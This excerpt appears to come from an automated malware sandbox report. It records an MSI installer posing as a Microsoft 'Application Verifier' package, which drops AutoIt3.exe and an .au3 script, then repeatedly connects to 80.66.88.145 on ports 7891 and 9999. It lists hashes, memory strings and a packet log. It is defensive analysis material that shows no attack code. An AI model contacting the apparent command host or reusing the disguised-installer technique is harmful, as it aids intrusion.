Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145
Source: unknown	TCP traffic detected without corresponding DNS query: 80.66.88.145

Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.
Source: cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145
Source: Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145&
Source: cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:7891
Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999d
Source: SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999hd
Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999l
Source: SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999n
Source: cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999pT$
Source: cmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://80.66.88.145:9999x
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: OLicenseHeartbeat.exe, 0000000C.00000002.812170962.000000000136A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nexus.officeapps.live.comh
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	Microsoft Cabinet archive data, many, 1669773 bytes, 2 files, at 0x2c +A "Autoit3.exe" +A "UGtZgHHT.au3", ID 56955, number 1, 51 datablocks, 0 compression
Category:	dropped
Size (bytes):	1669773
Entropy (8bit):	7.004183948977661
Encrypted:	false
SSDEEP:	24576:eT9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRpF:k9FBJZEH1X1arF0vN/nXr
MD5:	E7C3B16ED93B760546AE6756B12644DA
SHA1:	99B3B1AF70B45B4B815A814F61F9B6E509CD3BB6
SHA-256:	659733A584C52078AC6B568DFB34A089BEF2B3835A5EA737D32C1623A468B743
SHA-512:	B6EEAAEEB1F7C8335076075BC8033D5D4744544F3937EEADDCBEF5F7BA257A64C20A47F8388C1E8F10C5821DA8ABE0683BE8FD60C3E1A9AEA25E4A705E2F8B41
Malicious:	false
Preview:	MSCF.....z......,...............{...e...3..............VB. .Autoit3.exe............VB. .UGtZgHHT.au3.t/.Y....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...................................................................................................................................................................

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 3.3.14.5, Subject: Application Verifier x64 External Package - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft, Keywords: Installer, Template: Intel;1033, Revision Number: {609A83EA-2275-4DEA-858D-BAEFF01E16D0}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
Category:	dropped
Size (bytes):	1921024
Entropy (8bit):	6.966994454036273
Encrypted:	false
SSDEEP:	24576:ftncpVGP4I9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRp:epUP59FBJZEH1X1arF0vN/nX
MD5:	247A8CC39384E93D258360A11381000F
SHA1:	23893F035F8564DFEA5030B9FDD54120D96072BB
SHA-256:	6E068B9DCD8DF03FD6456FAEB4293C036B91A130A18F86A945C8964A576C1C70
SHA-512:	336ECA9569C0072E92CE16743F47BA9D6BE06390A196F8E81654D6A42642FF5C99E423BFED00A8396BB0B037D5B54DF8C3BDE53757646E7E1A204F3BE271C998
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2023 14:01:05.669145107 CEST	49690	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.681461096 CEST	49691	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.712990999 CEST	7891	49690	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.713164091 CEST	49690	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.713223934 CEST	49690	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.715008020 CEST	9999	49691	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.789221048 CEST	7891	49690	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.789556980 CEST	7891	49690	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.789592028 CEST	7891	49690	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.789676905 CEST	49690	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.789733887 CEST	49690	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.802953959 CEST	49692	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.830910921 CEST	7891	49690	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.843775988 CEST	7891	49692	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.843946934 CEST	49692	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.844060898 CEST	49692	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.880832911 CEST	7891	49692	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.880882978 CEST	7891	49692	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.881006956 CEST	7891	49692	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:05.881062984 CEST	49692	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.881115913 CEST	49692	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.881158113 CEST	49692	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:05.914927959 CEST	7891	49692	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:06.219929934 CEST	49691	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:06.255738020 CEST	9999	49691	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:06.766566038 CEST	49691	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:06.810133934 CEST	9999	49691	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:06.810844898 CEST	49693	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:06.849031925 CEST	9999	49693	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:07.360358000 CEST	49693	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:07.393773079 CEST	9999	49693	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:07.907313108 CEST	49693	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:07.940556049 CEST	9999	49693	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:08.058561087 CEST	49694	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:08.099719048 CEST	9999	49694	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:08.641751051 CEST	49694	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:08.681644917 CEST	9999	49694	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:09.235543013 CEST	49694	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:09.269253969 CEST	9999	49694	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:09.409147978 CEST	49695	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:09.443409920 CEST	9999	49695	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:10.048125029 CEST	49695	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.081598997 CEST	9999	49695	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:10.505003929 CEST	49696	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.538868904 CEST	7891	49696	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:10.539031029 CEST	49696	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.539072990 CEST	49696	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.574842930 CEST	7891	49696	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:10.576016903 CEST	7891	49696	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:10.576062918 CEST	7891	49696	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:10.576136112 CEST	49696	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.576136112 CEST	49696	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.735654116 CEST	49695	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:10.778984070 CEST	9999	49695	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.321501017 CEST	49696	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.348306894 CEST	49697	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.355397940 CEST	7891	49696	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.386725903 CEST	7891	49697	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.386933088 CEST	49697	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.422662973 CEST	49697	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.430847883 CEST	49698	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.465109110 CEST	9999	49698	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.466541052 CEST	7891	49697	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.466737986 CEST	7891	49697	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.466835022 CEST	49697	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.466973066 CEST	7891	49697	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:11.467170000 CEST	49697	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.485348940 CEST	49697	7891	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:11.518922091 CEST	7891	49697	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:12.048228025 CEST	49698	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:12.081741095 CEST	9999	49698	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:12.735822916 CEST	49698	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:12.769140005 CEST	9999	49698	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:12.877263069 CEST	49699	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:12.911011934 CEST	9999	49699	80.66.88.145	192.168.2.4
Jul 26, 2023 14:01:13.548459053 CEST	49699	9999	192.168.2.4	80.66.88.145
Jul 26, 2023 14:01:13.584130049 CEST	9999	49699	80.66.88.145	192.168.2.4
